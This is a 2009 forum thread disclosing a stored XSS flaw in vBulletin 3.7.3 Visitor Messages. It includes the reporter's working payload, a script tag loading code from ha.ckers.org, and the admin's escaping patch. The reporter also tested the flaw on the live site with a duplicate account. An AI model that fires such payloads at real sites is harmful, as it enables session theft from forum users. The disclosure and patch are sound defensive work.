vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix

SaswatPadhi's Avatar author of vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
Contributed by
This is an article on vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix in Ethical hacking Tips.

NOTICE



THIS XSS/XSRF VULNERABILITY WAS FOUND BY ME.

@ admin (shabbir)

Please don't ban me for this. Because I have not used this hack for any illegal / harmful purposes. (You can check all records). I have just tested an exploited and found it positive. Please fix it soon. I write this article so as to bring this thing to your eyes first, before anyone else knows about it and takes advantage.

Please do NOT reject this article and please approve it. Please don't remove this NOTICE section.


Action



First, we must check the version of vBulletin used by G4EF :
(1) Open any page such as your user control panel.
(2) View the page-source.
(3) You discover this :
Code: css
<style type="text/css" id="vbulletin_css">
/**
* vBulletin 3.7.3 CSS
* Style: 'Default Style'; Style ID: 1
*/
@import url("clientscript/vbulletin_css/style-eb31dabe-00001.css");
</style>
(4) Perfect ! G4EF is not upgraded to latest 3.8.x vBulletin. So, we can hack it.

The vulnerability :
When vBulletin is used with "Visitor Messages" add-on, we can easily execute external code by XSS vulnerability that exists. When the XSS script is posted as visitor message, the data is run through htmlentities(); before being displayed to the general public/forum members. However, when posting a new message, a new notification is sent to the commentee (the one who receives). And when the commentee visits usercp.php (User Control Panel), under the domain he is hit with an unfiltered xss attach !

How I tested it :
(1) I opened a duplicate account : _H4X0R_, which I request shabbir to kindly delete now.
(2) I posted some test visitor messages. The most interesting (and working) one was <SCRIPT SRC=http://ha.ckers.org/xss.js>
(3) I logged out.
(4) I logged in as _H4X0R_.
(5) Opened my user control panel : usercp.php.
(6) Whoa !! XSS successful !


Conclusion



Please don't use this knowledge for illegal/harmful purposes. This was written only for educational purposes.

I think I deserve some good reputation points and/or some rewards for this !

Sorry shabbir, for using duplicate account but you may delete it now. You should also understand that this was important for the security of the forum and so please don't ban me
Go4Expert Founder
9Jun2009,13:11   #2
shabbir's Avatar
Thanks for reporting Saswat and Upgrading to 3.7.6 is the preferred solution which we would also be doing it but here is the quick fix. Using vBulletin 3.7.3 and having all the functionality and plugins tested I preferred not to upgrade immediately ( Though I have the upgrade option ) and here is the patch for this Vulnerability.

Open usercp.php file
Go to Line Number 250
Find the following Code
Code:
$visitormessage['summary'] = fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50)));
Replace with
Code:
$visitormessage['summary'] = htmlspecialchars_uni(fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50))));
And that should be fine for this problem.

vBulletin also recommendeds to upgrade to latest version which has all the fixes.
~ Б0ЯИ Τ0 С0δЭ ~
9Jun2009,17:46   #3
SaswatPadhi's Avatar
Glad to know that it's fixed.
Security Expert
10Jun2009,07:05   #4
indiansword's Avatar
ncie find. I really like XSS vulnerabilities. not 100% sure but i think its already reported to miliw0rm couple of months back.
Last edited by indiansword; 10Jun2009 at 07:07..
~ Б0ЯИ Τ0 С0δЭ ~
10Jun2009,07:14   #5
SaswatPadhi's Avatar
What's miliw0rm ?
Security Expert
10Jun2009,07:20   #6
indiansword's Avatar
checkout miliw0rm.com , all the vulnerabilities which are found by different hackers and penetration testers are released under that program. Just search for "vbulletin" and you will see lots of them. This site plays a major role to help the developers of different CMSes to release a new version of their software after fixing the vulnerabilities.
~ Б0ЯИ Τ0 С0δЭ ~
10Jun2009,07:47   #7
SaswatPadhi's Avatar
Yeah, I got it. But it's not miliw0rm.com, it's milw0rm.com.
Lots of vulnerabilities and a md5 cracker too : perfect package for hackers.
Security Expert
10Jun2009,07:50   #8
indiansword's Avatar
yea sorry for that speling mistake.
Go4Expert Founder
10Jun2009,08:55   #9
shabbir's Avatar
Yes it was found on many other websites as well but no one had the Patch unless you upgrade the complete code and so here I provided the patch as well. Enjoy
Newbie Member
10Jun2009,13:36   #10
harshit's Avatar
great piece of information
Page 1 of 2
1
2